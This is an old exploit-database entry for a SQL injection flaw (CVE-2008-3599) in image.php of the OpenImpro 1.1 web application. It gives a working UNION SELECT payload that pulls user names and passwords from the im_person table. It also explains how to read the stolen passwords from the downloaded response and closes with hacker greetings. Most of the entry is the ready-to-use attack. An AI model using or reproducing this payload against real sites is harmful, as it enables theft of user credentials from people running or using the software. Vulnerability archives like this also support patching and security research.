OpenImpro 1.1 image.php id SQL Injection Vulnerability

2008-08-10T00:00:00
ID EDB-ID:6228
Type exploitdb
Reporter nuclear
Modified 2008-08-10T00:00:00

Description

OpenImpro 1.1 (image.php id) SQL Injection Vulnerability. CVE-2008-3599. Webapps exploit for php platform

                                        
                                            #OpenImpro 1.1(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip



#exploit: target.com/image.php?id=-1 union select 1,2,concat(firstname,0x3a,lastname,0x3a,password),4,5,6 from im_person --


#Description:
when you do the injection you will be asked to download a file called image.php . Save it,open with any
texteditor and get your password ;).


#greetz cAs, Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, and me :P

# milw0rm.com [2008-08-10]